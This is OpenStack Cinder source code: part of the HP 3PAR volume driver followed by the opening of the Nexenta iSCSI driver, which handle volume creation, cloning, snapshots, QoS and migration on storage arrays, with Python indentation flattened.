def _set_qos_rule(self, qos, vvs_name):
min_io = self._get_qos_value(qos, 'minIOPS')
max_io = self._get_qos_value(qos, 'maxIOPS')
min_bw = self._get_qos_value(qos, 'minBWS')
max_bw = self._get_qos_value(qos, 'maxBWS')
latency = self._get_qos_value(qos, 'latency')
priority = self._get_qos_value(qos, 'priority', 'normal')
qosRule = {}
if min_io:
qosRule['ioMinGoal'] = int(min_io)
if max_io is None:
qosRule['ioMaxLimit'] = int(min_io)
if max_io:
qosRule['ioMaxLimit'] = int(max_io)
if min_io is None:
qosRule['ioMinGoal'] = int(max_io)
if min_bw:
qosRule['bwMinGoalKB'] = int(min_bw) * units.Ki
if max_bw is None:
qosRule['bwMaxLimitKB'] = int(min_bw) * units.Ki
if max_bw:
qosRule['bwMaxLimitKB'] = int(max_bw) * units.Ki
if min_bw is None:
qosRule['bwMinGoalKB'] = int(max_bw) * units.Ki
if latency:
qosRule['latencyGoal'] = int(latency)
if priority:
qosRule['priority'] = self.qos_priority_level.get(priority.lower())
try:
self.client.createQoSRules(vvs_name, qosRule)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_("Error creating QOS rule %s") % qosRule)
def _add_volume_to_volume_set(self, volume, volume_name,
cpg, vvs_name, qos):
if vvs_name is not None:
# Admin has set a volume set name to add the volume to
try:
self.client.addVolumeToVolumeSet(vvs_name, volume_name)
except hpexceptions.HTTPNotFound:
msg = _('VV Set %s does not exist.') % vvs_name
LOG.error(msg)
raise exception.InvalidInput(reason=msg)
else:
vvs_name = self._get_3par_vvs_name(volume['id'])
domain = self.get_domain(cpg)
self.client.createVolumeSet(vvs_name, domain)
try:
self._set_qos_rule(qos, vvs_name)
self.client.addVolumeToVolumeSet(vvs_name, volume_name)
except Exception as ex:
# Cleanup the volume set if unable to create the qos rule
# or add the volume to the volume set
self.client.deleteVolumeSet(vvs_name)
raise exception.CinderException(ex)
def get_cpg(self, volume, allowSnap=False):
volume_name = self._get_3par_vol_name(volume['id'])
vol = self.client.getVolume(volume_name)
if 'userCPG' in vol:
return vol['userCPG']
elif allowSnap:
return vol['snapCPG']
return None
def _get_3par_vol_comment(self, volume_name):
vol = self.client.getVolume(volume_name)
if 'comment' in vol:
return vol['comment']
return None
def get_persona_type(self, volume, hp3par_keys=None):
default_persona = self.valid_persona_values[0]
type_id = volume.get('volume_type_id', None)
volume_type = None
if type_id is not None:
volume_type = self._get_volume_type(type_id)
if hp3par_keys is None:
hp3par_keys = self._get_keys_by_volume_type(volume_type)
persona_value = self._get_key_value(hp3par_keys, 'persona',
default_persona)
if persona_value not in self.valid_persona_values:
err = _("Must specify a valid persona %(valid)s, "
"value '%(persona)s' is invalid.") % \
({'valid': self.valid_persona_values,
'persona': persona_value})
LOG.error(err)
raise exception.InvalidInput(reason=err)
# persona is set by the id so remove the text and return the id
# i.e for persona '1 - Generic' returns 1
persona_id = persona_value.split(' ')
return persona_id[0]
def get_volume_settings_from_type(self, volume):
cpg = None
snap_cpg = None
volume_type = None
vvs_name = None
hp3par_keys = {}
qos = {}
type_id = volume.get('volume_type_id', None)
if type_id is not None:
volume_type = self._get_volume_type(type_id)
hp3par_keys = self._get_keys_by_volume_type(volume_type)
vvs_name = self._get_key_value(hp3par_keys, 'vvs')
if vvs_name is None:
qos = self._get_qos_by_volume_type(volume_type)
cpg = self._get_key_value(hp3par_keys, 'cpg',
self.config.hp3par_cpg)
if cpg is not self.config.hp3par_cpg:
# The cpg was specified in a volume type extra spec so it
# needs to be validated that it's in the correct domain.
self.validate_cpg(cpg)
# Also, look to see if the snap_cpg was specified in volume
# type extra spec, if not use the extra spec cpg as the
# default.
snap_cpg = self._get_key_value(hp3par_keys, 'snap_cpg', cpg)
else:
# default snap_cpg to hp3par_cpg_snap if it's not specified
# in the volume type extra specs.
snap_cpg = self.config.hp3par_cpg_snap
# if it's still not set or empty then set it to the cpg
# specified in the cinder.conf file.
if not self.config.hp3par_cpg_snap:
snap_cpg = cpg
# if provisioning is not set use thin
default_prov = self.valid_prov_values[0]
prov_value = self._get_key_value(hp3par_keys, 'provisioning',
default_prov)
# check for valid provisioning type
if prov_value not in self.valid_prov_values:
err = _("Must specify a valid provisioning type %(valid)s, "
"value '%(prov)s' is invalid.") % \
({'valid': self.valid_prov_values,
'prov': prov_value})
LOG.error(err)
raise exception.InvalidInput(reason=err)
tpvv = True
if prov_value == "full":
tpvv = False
# check for valid persona even if we don't use it until
# attach time, this will give the end user notice that the
# persona type is invalid at volume creation time
self.get_persona_type(volume, hp3par_keys)
return {'cpg': cpg, 'snap_cpg': snap_cpg,
'vvs_name': vvs_name, 'qos': qos,
'tpvv': tpvv, 'volume_type': volume_type}
def create_volume(self, volume):
LOG.debug("CREATE VOLUME (%s : %s %s)" %
(volume['display_name'], volume['name'],
self._get_3par_vol_name(volume['id'])))
try:
comments = {'volume_id': volume['id'],
'name': volume['name'],
'type': 'OpenStack'}
name = volume.get('display_name', None)
if name:
comments['display_name'] = name
# get the options supported by volume types
type_info = self.get_volume_settings_from_type(volume)
volume_type = type_info['volume_type']
vvs_name = type_info['vvs_name']
qos = type_info['qos']
cpg = type_info['cpg']
snap_cpg = type_info['snap_cpg']
tpvv = type_info['tpvv']
type_id = volume.get('volume_type_id', None)
if type_id is not None:
comments['volume_type_name'] = volume_type.get('name')
comments['volume_type_id'] = type_id
if vvs_name is not None:
comments['vvs'] = vvs_name
else:
comments['qos'] = qos
extras = {'comment': json.dumps(comments),
'snapCPG': snap_cpg,
'tpvv': tpvv}
capacity = self._capacity_from_size(volume['size'])
volume_name = self._get_3par_vol_name(volume['id'])
self.client.createVolume(volume_name, cpg, capacity, extras)
if qos or vvs_name is not None:
try:
self._add_volume_to_volume_set(volume, volume_name,
cpg, vvs_name, qos)
except exception.InvalidInput as ex:
# Delete the volume if unable to add it to the volume set
self.client.deleteVolume(volume_name)
LOG.error(ex)
raise exception.CinderException(ex)
except hpexceptions.HTTPConflict:
msg = _("Volume (%s) already exists on array") % volume_name
LOG.error(msg)
raise exception.Duplicate(msg)
except hpexceptions.HTTPBadRequest as ex:
LOG.error(ex)
raise exception.Invalid(ex.get_description())
except exception.InvalidInput as ex:
LOG.error(ex)
raise ex
except exception.CinderException as ex:
LOG.error(ex)
raise ex
except Exception as ex:
LOG.error(ex)
raise exception.CinderException(ex)
def _copy_volume(self, src_name, dest_name, cpg, snap_cpg=None,
tpvv=True):
# Virtual volume sets are not supported with the -online option
LOG.debug('Creating clone of a volume %(src)s to %(dest)s.' %
{'src': src_name, 'dest': dest_name})
optional = {'tpvv': tpvv, 'online': True}
if snap_cpg is not None:
optional['snapCPG'] = snap_cpg
body = self.client.copyVolume(src_name, dest_name, cpg, optional)
return body['taskid']
def get_next_word(self, s, search_string):
"""Return the next word.
Search 's' for 'search_string', if found return the word preceding
'search_string' from 's'.
"""
word = re.search(search_string.strip(' ') + ' ([^ ]*)', s)
return word.groups()[0].strip(' ')
def _get_3par_vol_comment_value(self, vol_comment, key):
comment_dict = dict(ast.literal_eval(vol_comment))
if key in comment_dict:
return comment_dict[key]
return None
def create_cloned_volume(self, volume, src_vref):
try:
orig_name = self._get_3par_vol_name(volume['source_volid'])
vol_name = self._get_3par_vol_name(volume['id'])
type_info = self.get_volume_settings_from_type(volume)
# make the 3PAR copy the contents.
# can't delete the original until the copy is done.
self._copy_volume(orig_name, vol_name, cpg=type_info['cpg'],
snap_cpg=type_info['snap_cpg'],
tpvv=type_info['tpvv'])
return None
except hpexceptions.HTTPForbidden:
raise exception.NotAuthorized()
except hpexceptions.HTTPNotFound:
raise exception.NotFound()
except Exception as ex:
LOG.error(ex)
raise exception.CinderException(ex)
def delete_volume(self, volume):
try:
volume_name = self._get_3par_vol_name(volume['id'])
# Try and delete the volume, it might fail here because
# the volume is part of a volume set which will have the
# volume set name in the error.
try:
self.client.deleteVolume(volume_name)
except hpexceptions.HTTPBadRequest as ex:
if ex.get_code() == 29:
if self.client.isOnlinePhysicalCopy(volume_name):
LOG.debug("Found an online copy for %(volume)s"
% {'volume': volume_name})
# the volume is in process of being cloned.
# stopOnlinePhysicalCopy will also delete
# the volume once it stops the copy.
self.client.stopOnlinePhysicalCopy(volume_name)
else:
LOG.error(ex)
raise ex
else:
LOG.error(ex)
raise ex
except hpexceptions.HTTPConflict as ex:
if ex.get_code() == 34:
# This is a special case which means the
# volume is part of a volume set.
vvset_name = self.client.findVolumeSet(volume_name)
LOG.debug("Returned vvset_name = %s" % vvset_name)
if vvset_name is not None and \
vvset_name.startswith('vvs-'):
# We have a single volume per volume set, so
# remove the volume set.
self.client.deleteVolumeSet(
self._get_3par_vvs_name(volume['id']))
elif vvset_name is not None:
# We have a pre-defined volume set just remove the
# volume and leave the volume set.
self.client.removeVolumeFromVolumeSet(vvset_name,
volume_name)
self.client.deleteVolume(volume_name)
else:
LOG.error(ex)
raise ex
except hpexceptions.HTTPNotFound as ex:
# We'll let this act as if it worked
# it helps clean up the cinder entries.
msg = _("Delete volume id not found. Removing from cinder: "
"%(id)s Ex: %(msg)s") % {'id': volume['id'], 'msg': ex}
LOG.warning(msg)
except hpexceptions.HTTPForbidden as ex:
LOG.error(ex)
raise exception.NotAuthorized(ex.get_description())
except hpexceptions.HTTPConflict as ex:
LOG.error(ex)
raise exception.VolumeIsBusy(ex.get_description())
except Exception as ex:
LOG.error(ex)
raise exception.CinderException(ex)
def create_volume_from_snapshot(self, volume, snapshot):
"""Creates a volume from a snapshot.
"""
LOG.debug("Create Volume from Snapshot\n%s\n%s" %
(pprint.pformat(volume['display_name']),
pprint.pformat(snapshot['display_name'])))
if volume['size'] < snapshot['volume_size']:
err = ("You cannot reduce size of the volume. It must "
"be greater than or equal to the snapshot.")
LOG.error(err)
raise exception.InvalidInput(reason=err)
try:
snap_name = self._get_3par_snap_name(snapshot['id'])
volume_name = self._get_3par_vol_name(volume['id'])
extra = {'volume_id': volume['id'],
'snapshot_id': snapshot['id']}
volume_type = None
type_id = volume.get('volume_type_id', None)
vvs_name = None
qos = {}
hp3par_keys = {}
if type_id is not None:
volume_type = self._get_volume_type(type_id)
hp3par_keys = self._get_keys_by_volume_type(volume_type)
vvs_name = self._get_key_value(hp3par_keys, 'vvs')
if vvs_name is None:
qos = self._get_qos_by_volume_type(volume_type)
name = volume.get('display_name', None)
if name:
extra['display_name'] = name
description = volume.get('display_description', None)
if description:
extra['description'] = description
optional = {'comment': json.dumps(extra),
'readOnly': False}
self.client.createSnapshot(volume_name, snap_name, optional)
# Grow the snapshot if needed
growth_size = volume['size'] - snapshot['volume_size']
if growth_size > 0:
try:
LOG.debug('Converting to base volume type: %s.' %
volume['id'])
self._convert_to_base_volume(volume)
growth_size_mib = growth_size * units.Gi / units.Mi
LOG.debug('Growing volume: %(id)s by %(size)s GiB.' %
{'id': volume['id'], 'size': growth_size})
self.client.growVolume(volume_name, growth_size_mib)
except Exception as ex:
LOG.error(_("Error extending volume %(id)s. Ex: %(ex)s") %
{'id': volume['id'], 'ex': ex})
# Delete the volume if unable to grow it
self.client.deleteVolume(volume_name)
raise exception.CinderException(ex)
if qos or vvs_name is not None:
cpg = self._get_key_value(hp3par_keys, 'cpg',
self.config.hp3par_cpg)
try:
self._add_volume_to_volume_set(volume, volume_name,
cpg, vvs_name, qos)
except Exception as ex:
# Delete the volume if unable to add it to the volume set
self.client.deleteVolume(volume_name)
LOG.error(ex)
raise exception.CinderException(ex)
except hpexceptions.HTTPForbidden as ex:
LOG.error(ex)
raise exception.NotAuthorized()
except hpexceptions.HTTPNotFound as ex:
LOG.error(ex)
raise exception.NotFound()
except Exception as ex:
LOG.error(ex)
raise exception.CinderException(ex)
def create_snapshot(self, snapshot):
LOG.debug("Create Snapshot\n%s" % pprint.pformat(snapshot))
try:
snap_name = self._get_3par_snap_name(snapshot['id'])
vol_name = self._get_3par_vol_name(snapshot['volume_id'])
extra = {'volume_name': snapshot['volume_name']}
vol_id = snapshot.get('volume_id', None)
if vol_id:
extra['volume_id'] = vol_id
try:
extra['display_name'] = snapshot['display_name']
except AttributeError:
pass
try:
extra['description'] = snapshot['display_description']
except AttributeError:
pass
optional = {'comment': json.dumps(extra),
'readOnly': True}
if self.config.hp3par_snapshot_expiration:
optional['expirationHours'] = (
self.config.hp3par_snapshot_expiration)
if self.config.hp3par_snapshot_retention:
optional['retentionHours'] = (
self.config.hp3par_snapshot_retention)
self.client.createSnapshot(snap_name, vol_name, optional)
except hpexceptions.HTTPForbidden as ex:
LOG.error(ex)
raise exception.NotAuthorized()
except hpexceptions.HTTPNotFound as ex:
LOG.error(ex)
raise exception.NotFound()
def update_volume_key_value_pair(self, volume, key, value):
"""Updates key,value pair as metadata onto virtual volume.
If key already exists, the value will be replaced.
"""
LOG.debug("VOLUME (%s : %s %s) Updating KEY-VALUE pair: (%s : %s)" %
(volume['display_name'],
volume['name'],
self._get_3par_vol_name(volume['id']),
key,
value))
try:
volume_name = self._get_3par_vol_name(volume['id'])
if value is None:
value = ''
self.client.setVolumeMetaData(volume_name, key, value)
except Exception as ex:
msg = _('Failure in update_volume_key_value_pair:%s') % ex
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def clear_volume_key_value_pair(self, volume, key):
"""Clears key,value pairs metadata from virtual volume."""
LOG.debug("VOLUME (%s : %s %s) Clearing Key : %s)" %
(volume['display_name'], volume['name'],
self._get_3par_vol_name(volume['id']), key))
try:
volume_name = self._get_3par_vol_name(volume['id'])
self.client.removeVolumeMetaData(volume_name, key)
except Exception as ex:
msg = _('Failure in clear_volume_key_value_pair:%s') % ex
LOG.error(msg)
raise exception.VolumeBackendAPIException(data=msg)
def attach_volume(self, volume, instance_uuid):
LOG.debug("Attach Volume\n%s" % pprint.pformat(volume))
try:
self.update_volume_key_value_pair(volume,
'HPQ-CS-instance_uuid',
instance_uuid)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_("Error attaching volume %s") % volume)
def detach_volume(self, volume):
LOG.debug("Detach Volume\n%s" % pprint.pformat(volume))
try:
self.clear_volume_key_value_pair(volume, 'HPQ-CS-instance_uuid')
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_("Error detaching volume %s") % volume)
def migrate_volume(self, volume, host):
"""Migrate directly if source and dest are managed by same storage.
:param volume: A dictionary describing the volume to migrate
:param host: A dictionary describing the host to migrate to, where
host['host'] is its name, and host['capabilities'] is a
dictionary of its reported capabilities.
:returns (False, None) if the driver does not support migration,
(True, None) if successful
"""
dbg = {'id': volume['id'], 'host': host['host']}
LOG.debug('enter: migrate_volume: id=%(id)s, host=%(host)s.' % dbg)
false_ret = (False, None)
# Make sure volume is not attached
if volume['status'] != 'available':
LOG.debug('Volume is attached: migrate_volume: '
'id=%(id)s, host=%(host)s.' % dbg)
return false_ret
if 'location_info' not in host['capabilities']:
return false_ret
info = host['capabilities']['location_info']
try:
(dest_type, dest_id, dest_cpg) = info.split(':')
except ValueError:
return false_ret
sys_info = self.client.getStorageSystemInfo()
if not (dest_type == 'HP3PARDriver' and
dest_id == sys_info['serialNumber']):
LOG.debug('Dest does not match: migrate_volume: '
'id=%(id)s, host=%(host)s.' % dbg)
return false_ret
type_info = self.get_volume_settings_from_type(volume)
if dest_cpg == type_info['cpg']:
LOG.debug('CPGs are the same: migrate_volume: '
'id=%(id)s, host=%(host)s.' % dbg)
return false_ret
# Check to make sure CPGs are in the same domain
src_domain = self.get_domain(type_info['cpg'])
dst_domain = self.get_domain(dest_cpg)
if src_domain != dst_domain:
LOG.debug('CPGs in different domains: migrate_volume: '
'id=%(id)s, host=%(host)s.' % dbg)
return false_ret
self._convert_to_base_volume(volume, new_cpg=dest_cpg)
# TODO(Ramy) When volume retype is available,
# use that to change the type
LOG.debug('leave: migrate_volume: id=%(id)s, host=%(host)s.' % dbg)
return (True, None)
def _convert_to_base_volume(self, volume, new_cpg=None):
try:
type_info = self.get_volume_settings_from_type(volume)
if new_cpg:
cpg = new_cpg
else:
cpg = type_info['cpg']
# Change the name such that it is unique since 3PAR
# names must be unique across all CPGs
volume_name = self._get_3par_vol_name(volume['id'])
temp_vol_name = volume_name.replace("osv-", "omv-")
# Create a physical copy of the volume
task_id = self._copy_volume(volume_name, temp_vol_name,
cpg, cpg, type_info['tpvv'])
LOG.debug('Copy volume scheduled: convert_to_base_volume: '
'id=%s.' % volume['id'])
# Wait for the physical copy task to complete
def _wait_for_task(task_id):
status = self.client.getTask(task_id)
LOG.debug("3PAR Task id %(id)s status = %(status)s" %
{'id': task_id,
'status': status['status']})
if status['status'] is not self.client.TASK_ACTIVE:
self._task_status = status
raise loopingcall.LoopingCallDone()
self._task_status = None
timer = loopingcall.FixedIntervalLoopingCall(
_wait_for_task, task_id)
timer.start(interval=1).wait()
if self._task_status['status'] is not self.client.TASK_DONE:
dbg = {'status': self._task_status, 'id': volume['id']}
msg = _('Copy volume task failed: convert_to_base_volume: '
'id=%(id)s, status=%(status)s.') % dbg
raise exception.CinderException(msg)
else:
LOG.debug('Copy volume completed: convert_to_base_volume: '
'id=%s.' % volume['id'])
comment = self._get_3par_vol_comment(volume_name)
if comment:
self.client.modifyVolume(temp_vol_name, {'comment': comment})
LOG.debug('Volume rename completed: convert_to_base_volume: '
'id=%s.' % volume['id'])
# Delete source volume after the copy is complete
self.client.deleteVolume(volume_name)
LOG.debug('Delete src volume completed: convert_to_base_volume: '
'id=%s.' % volume['id'])
# Rename the new volume to the original name
self.client.modifyVolume(temp_vol_name, {'newName': volume_name})
LOG.info(_('Completed: convert_to_base_volume: '
'id=%s.') % volume['id'])
except hpexceptions.HTTPConflict:
msg = _("Volume (%s) already exists on array.") % volume_name
LOG.error(msg)
raise exception.Duplicate(msg)
except hpexceptions.HTTPBadRequest as ex:
LOG.error(ex)
raise exception.Invalid(ex.get_description())
except exception.InvalidInput as ex:
LOG.error(ex)
raise ex
except exception.CinderException as ex:
LOG.error(ex)
raise ex
except Exception as ex:
LOG.error(ex)
raise exception.CinderException(ex)
def delete_snapshot(self, snapshot):
LOG.debug("Delete Snapshot id %s %s" % (snapshot['id'],
pprint.pformat(snapshot)))
try:
snap_name = self._get_3par_snap_name(snapshot['id'])
self.client.deleteVolume(snap_name)
except hpexceptions.HTTPForbidden as ex:
LOG.error(ex)
raise exception.NotAuthorized()
except hpexceptions.HTTPNotFound as ex:
# We'll let this act as if it worked
# it helps clean up the cinder entries.
msg = _("Delete Snapshot id not found. Removing from cinder: "
"%(id)s Ex: %(msg)s") % {'id': snapshot['id'], 'msg': ex}
LOG.warning(msg)
except hpexceptions.HTTPConflict as ex:
LOG.error(ex)
raise exception.SnapshotIsBusy(snapshot_name=snapshot['id'])
def _get_3par_hostname_from_wwn_iqn(self, wwns, iqns):
if wwns is not None and not isinstance(wwns, list):
wwns = [wwns]
if iqns is not None and not isinstance(iqns, list):
iqns = [iqns]
out = self.client.getHosts()
hosts = out['members']
for host in hosts:
if 'iSCSIPaths' in host and iqns is not None:
iscsi_paths = host['iSCSIPaths']
for iscsi in iscsi_paths:
for iqn in iqns:
if iqn == iscsi['name']:
return host['name']
if 'FCPaths' in host and wwns is not None:
fc_paths = host['FCPaths']
for fc in fc_paths:
for wwn in wwns:
if wwn == fc['wwn']:
return host['name']
def terminate_connection(self, volume, hostname, wwn=None, iqn=None):
"""Driver entry point to unattach a volume from an instance."""
try:
# does 3par know this host by a different name?
if hostname in self.hosts_naming_dict:
hostname = self.hosts_naming_dict.get(hostname)
self.delete_vlun(volume, hostname)
return
except hpexceptions.HTTPNotFound as e:
if 'host does not exist' in e.get_description():
# use the wwn to see if we can find the hostname
hostname = self._get_3par_hostname_from_wwn_iqn(wwn, iqn)
# no 3par host, re-throw
if (hostname is None):
LOG.error(e)
raise
else:
# not a 'host does not exist' HTTPNotFound exception, re-throw
LOG.error(e)
raise
# try again with name retrieved from 3par
self.delete_vlun(volume, hostname)
def build_nsp(self, portPos):
return '%s:%s:%s' % (portPos['node'],
portPos['slot'],
portPos['cardPort'])
def build_portPos(self, nsp):
split = nsp.split(":")
portPos = {}
portPos['node'] = int(split[0])
portPos['slot'] = int(split[1])
portPos['cardPort'] = int(split[2])
return portPos
|
adelina-t/cinder | cinder/volume/drivers/nexenta/iscsi.py | # Copyright 2011 Nexenta Systems, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
:mod:`nexenta.iscsi` -- Driver to store volumes on Nexenta Appliance
=====================================================================
.. automodule:: nexenta.volume
.. moduleauthor:: <NAME> <<EMAIL>>
.. moduleauthor:: <NAME> <<EMAIL>>
.. moduleauthor:: <NAME> <<EMAIL>>
"""
from cinder import exception
from cinder.openstack.common.gettextutils import _
from cinder.openstack.common import log as logging
from cinder.volume import driver
from cinder.volume.drivers import nexenta
from cinder.volume.drivers.nexenta import jsonrpc
from cinder.volume.drivers.nexenta import options
from cinder.volume.drivers.nexenta import utils
VERSION = '1.2.1'
LOG = logging.getLogger(__name__)
class NexentaISCSIDriver(driver.ISCSIDriver): # pylint: disable=R0921
"""Executes volume driver commands on Nexenta Appliance.
Version history:
1.0.0 - Initial driver version.
1.0.1 - Fixed bug #1236626: catch "does not exist" exception of
lu_exists.
1.1.0 - Changed class name to NexentaISCSIDriver.
1.1.1 - Ignore "does not exist" exception of nms.snapshot.destroy.
1.1.2 - Optimized create_cloned_volume, replaced zfs send recv with zfs
clone.
1.1.3 - Extended volume stats provided by _update_volume_stats method.
1.2.0 - Added volume migration with storage assist method.
1.2.1 - Fixed bug #1263258: now migrate_volume update provider_location
of migrated volume; after migrating volume migrate_volume
destroy snapshot on migration destination.
"""
VERSION = VERSION
def __init__(self, *args, **kwargs):
super(NexentaISCSIDriver, self).__init__(*args, **kwargs)
self.nms = None
if self.configuration:
self.configuration.append_config_values(
options.NEXENTA_CONNECTION_OPTIONS)
self.configuration.append_config_values(
options.NEXENTA_ISCSI_OPTIONS)
self.configuration.append_config_values(
options.NEXENTA_VOLUME_OPTIONS)
self.configuration.append_config_values(
options.NEXENTA_RRMGR_OPTIONS)
self.nms_protocol = self.configuration.nexenta_rest_protocol
self.nms_host = self.configuration.nexenta_host
self.nms_port = self.configuration.nexenta_rest_port
self.nms_user = self.configuration.nexenta_user
self.nms_password = self.configuration.nexenta_password
self.volume = self.configuration.nexenta_volume
self.rrmgr_compression = self.configuration.nexenta_rrmgr_compression
self.rrmgr_tcp_buf_size = self.configuration.nexenta_rrmgr_tcp_buf_size
self.rrmgr_connections = self.configuration.nexenta_rrmgr_connections
self.iscsi_target_portal_port = \
self.configuration.nexenta_iscsi_target_portal_port
@property
def backend_name(self):
backend_name = None
if self.configuration:
backend_name = self.configuration.safe_get('volume_backend_name')
if not backend_name:
backend_name = self.__class__.__name__
return backend_name
def do_setup(self, context):
if self.nms_protocol == 'auto':
protocol, auto = 'http', True
else:
protocol, auto = self.nms_protocol, False
self.nms = jsonrpc.NexentaJSONProxy(
protocol, self.nms_host, self.nms_port, '/rest/nms', self.nms_user,
self.nms_password, auto=auto)
def check_for_setup_error(self):
"""Verify that the volume for our zvols exists.
:raise: :py:exc:`LookupError`
"""
if not self.nms.volume.object_exists(self.volume):
raise LookupError(_("Volume %s does not exist in Nexenta SA"),
self.volume)
def _get_zvol_name(self, volume_name):
"""Return zvol name that corresponds given volume name."""
return '%s/%s' % (self.volume, volume_name)
def _get_target_name(self, volume_name):
"""Return iSCSI target name to access volume."""
return '%s%s' % (self.configuration.nexenta_target_prefix, volume_name)
def _get_target_group_name(self, volume_name):
"""Return Nexenta iSCSI target group name for volume."""
return '%s%s' % (self.configuration.nexenta_target_group_prefix,
volume_name)
@staticmethod
def _get_clone_snapshot_name(volume):
"""Return name for snapshot that will be used to clone the volume."""
return 'cinder-clone-snapshot-%(id)s' % volume
@staticmethod
def _is_clone_snapshot_name(snapshot):
"""Check if snapshot is created for cloning."""
name = snapshot.split('@')[-1]
return name.startswith('cinder-clone-snapshot-')
def create_volume(self, volume):
"""Create a zvol on appliance.
:param volume: volume reference
:return: model update dict for volume reference
"""
self.nms.zvol.create(
self._get_zvol_name(volume['name']),
'%sG' % (volume['size'],),
self.configuration.nexenta_blocksize,
self.configuration.nexenta_sparse)
return self.create_export(None, volume)
def extend_volume(self, volume, new_size):
"""Extend an existing volume.
:param volume: volume reference
:param new_size: volume new size in GB
"""
LOG.info(_('Extending volume: %(id)s New size: %(size)s GB'),
{'id': volume['id'], 'size': new_size})
self.nms.zvol.set_child_prop(self._get_zvol_name(volume['name']),
'volsize', '%sG' % new_size)
def delete_volume(self, volume):
"""Destroy a zvol on appliance.
:param volume: volume reference
"""
volume_name = self._get_zvol_name(volume['name'])
props = self.nms.zvol.get_child_props(volume_name, 'origin') or {}
try:
self.nms.zvol.destroy(volume_name, '')
except nexenta.NexentaException as exc:
if 'does not exist' in exc.args[0]:
LOG.info(_('Volume %s does not exist, it seems it was already '
'deleted.'), volume_name)
return
if 'zvol has children' in exc.args[0]:
raise exception.VolumeIsBusy(volume_name=volume_name)
raise
origin = props.get('origin')
if origin and self._is_clone_snapshot_name(origin):
volume, snapshot = origin.split('@')
volume = volume.lstrip('%s/' % self.configuration.nexenta_volume)
try:
self.delete_snapshot({'volume_name': volume, 'name': snapshot})
except nexenta.NexentaException as exc:
LOG.warning(_('Cannot delete snapshot %(origin)s: %(exc)s'),
{'origin': origin, 'exc': exc})
def create_cloned_volume(self, volume, src_vref):
"""Creates a clone of the specified volume.
:param volume: new volume reference
:param src_vref: source volume reference
"""
snapshot = {'volume_name': src_vref['name'],
'name': self._get_clone_snapshot_name(volume)}
LOG.debug('Creating temp snapshot of the original volume: '
'%(volume_name)s@%(name)s', snapshot)
# We don't delete this snapshot, because this snapshot will be origin
# of new volume. This snapshot will be automatically promoted by NMS
# when user will delete origin volume. But when cloned volume deleted
# we check its origin property and delete source snapshot if needed.
self.create_snapshot(snapshot)
try:
self.create_volume_from_snapshot(volume, snapshot)
except nexenta.NexentaException:
LOG.error(_('Volume creation failed, deleting created snapshot '
'%(volume_name)s@%(name)s'), snapshot)
try:
self.delete_snapshot(snapshot)
except (nexenta.NexentaException, exception.SnapshotIsBusy):
LOG.warning(_('Failed to delete zfs snapshot '
'%(volume_name)s@%(name)s'), snapshot)
raise
def _get_zfs_send_recv_cmd(self, src, dst):
"""Returns rrmgr command for source and destination."""
return utils.get_rrmgr_cmd(src, dst,
compression=self.rrmgr_compression,
tcp_buf_size=self.rrmgr_tcp_buf_size,
connections=self.rrmgr_connections)
@staticmethod
def get_nms_for_url(url):
"""Returns initialized nms object for url."""
auto, scheme, user, password, host, port, path =\
utils.parse_nms_url(url)
return jsonrpc.NexentaJSONProxy(scheme, host, port, path, user,
password, auto=auto)
def migrate_volume(self, ctxt, volume, host):
"""Migrate if volume and host are managed by Nexenta appliance.
:param ctxt: context
:param volume: a dictionary describing the volume to migrate
:param host: a dictionary describing the host to migrate to
"""
LOG.debug('Enter: migrate_volume: id=%(id)s, host=%(host)s' %
{'id': volume['id'], 'host': host})
false_ret = (False, None)
if volume['status'] != 'available':
return false_ret
if 'capabilities' not in host:
return false_ret
capabilities = host['capabilities']
if 'location_info' not in capabilities or \
'iscsi_target_portal_port' not in capabilities or \
'nms_url' not in capabilities:
return false_ret
iscsi_target_portal_port = capabilities['iscsi_target_portal_port']
nms_url = capabilities['nms_url']
dst_parts = capabilities['location_info'].split(':')
if capabilities.get('vendor_name') != 'Nexenta' or \
dst_parts[0] != self.__class__.__name__ or \
capabilities['free_capacity_gb'] < volume['size']:
return false_ret
dst_host, dst_volume = dst_parts[1:]
ssh_bound = False
ssh_bindings = self.nms.appliance.ssh_list_bindings()
for bind in ssh_bindings:
if bind.index(dst_host) != -1:
ssh_bound = True
break
if not ssh_bound:
LOG.warning(_("Remote NexentaStor appliance at %s should be "
"SSH-bound."), dst_host)
# Create temporary snapshot of volume on NexentaStor Appliance.
snapshot = {
'volume_name': volume['name'],
'name': utils.get_migrate_snapshot_name(volume)
}
self.create_snapshot(snapshot)
src = '%(volume)s/%(zvol)s@%(snapshot)s' % {
'volume': self.volume,
'zvol': volume['name'],
'snapshot': snapshot['name']
}
dst = ':'.join([dst_host, dst_volume])
try:
self.nms.appliance.execute(self._get_zfs_send_recv_cmd(src, dst))
except nexenta.NexentaException as exc:
LOG.warning(_("Cannot send source snapshot %(src)s to "
"destination %(dst)s. Reason: %(exc)s"),
{'src': src, 'dst': dst, 'exc': exc})
return false_ret
finally:
try:
self.delete_snapshot(snapshot)
except nexenta.NexentaException as exc:
LOG.warning(_("Cannot delete temporary source snapshot "
"%(src)s on NexentaStor Appliance: %(exc)s"),
{'src': src, 'exc': exc})
try:
self.delete_volume(volume)
except nexenta.NexentaException as exc:
LOG.warning(_("Cannot delete source volume %(volume)s on "
"NexentaStor Appliance: %(exc)s"),
{'volume': volume['name'], 'exc': exc})
dst_nms = self.get_nms_for_url(nms_url)
dst_snapshot = '%s/%s@%s' % (dst_volume, volume['name'],
snapshot['name'])
try:
dst_nms.snapshot.destroy(dst_snapshot, '')
except nexenta.NexentaException as exc:
LOG.warning(_("Cannot delete temporary destination snapshot "
"%(dst)s on NexentaStor Appliance: %(exc)s"),
{'dst': dst_snapshot, 'exc': exc})
provider_location = '%(host)s:%(port)s,1 %(name)s 0' % {
'host': dst_host,
'port': iscsi_target_portal_port,
'name': self._get_target_name(volume['name'])
}
return True, {'provider_location': provider_location}
def create_snapshot(self, snapshot):
"""Create snapshot of existing zvol on appliance.
